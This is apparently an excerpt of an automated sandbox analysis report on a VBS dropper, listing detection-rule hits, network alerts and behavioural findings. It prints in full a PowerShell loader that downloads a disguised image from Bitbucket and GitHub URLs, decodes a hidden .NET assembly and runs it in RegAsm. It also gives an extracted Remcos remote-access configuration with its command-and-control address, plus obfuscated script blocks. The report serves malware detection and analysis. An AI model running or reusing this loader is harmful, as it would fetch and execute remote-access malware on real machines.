#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { 
try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g
#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", ProcessId: 2420, ProcessName: wscript.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in 
$shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs", ProcessId: 2420, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7780, ProcessName: svchost.exe

              Data Obfuscation

              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; 
return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-10-21T17:05:22.970205+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 185.199.108.133 | 443 | 192.168.2.6 | 49789 | TCP
              2024-10-21T17:05:22.970205+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 185.199.108.133 | 443 | 192.168.2.6 | 49789 | TCP
              2024-10-21T17:05:24.318537+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49805 | 154.216.17.141 | 5922 | TCP
              2024-10-21T17:05:19.370699+0200 | 2049038 | 1 | A Network Trojan was detected | 52.217.161.161 | 443 | 192.168.2.6 | 49764 | TCP
              2024-10-21T17:05:25.552751+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49812 | 178.237.33.50 | 80 | TCP

              AV Detection

              Source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.17.141:5922:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MBKA6A", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Order.vbsReversingLabs: Detection: 13%
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR
              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042B1E6 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_0042B1E6
              Source: RegAsm.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.161.161:443 -> 192.168.2.6:49764 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49789 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_004081F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004072E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00407733
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,8_2_00414795
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00440A59 FindFirstFileExA,8_2_00440A59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00404CF3 FindFirstFileW,FindNextFileW,8_2_00404CF3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00405C8E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_00407FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_0040511A

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

              Networking

              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49805 -> 154.216.17.141:5922
              Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.199.108.133:443 -> 192.168.2.6:49789
              Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.199.108.133:443 -> 192.168.2.6:49789
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 52.217.161.161:443 -> 192.168.2.6:49764
              Source: Malware configuration extractorIPs: 154.216.17.141
              Source: global trafficTCP traffic: 192.168.2.6:49805 -> 154.216.17.141:5922
              Source: global trafficHTTP traffic detected: GET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL7cX5kPi6DbUpaR6DWxL6p2AoqNVyGjtCQwiwBbff1ljXgOuGBmoyLJFZstpwAA%2FyrPqTNeLsWXeL0vsNRfQh02Nz7sQLG0XBmnN05UIwxcpj6jLvFo2Veyw%3D%3D&Expires=1729524823 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49812 -> 178.237.33.50:80
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.17.141
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,8_2_0040F4A7
              Source: global trafficHTTP traffic detected: GET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
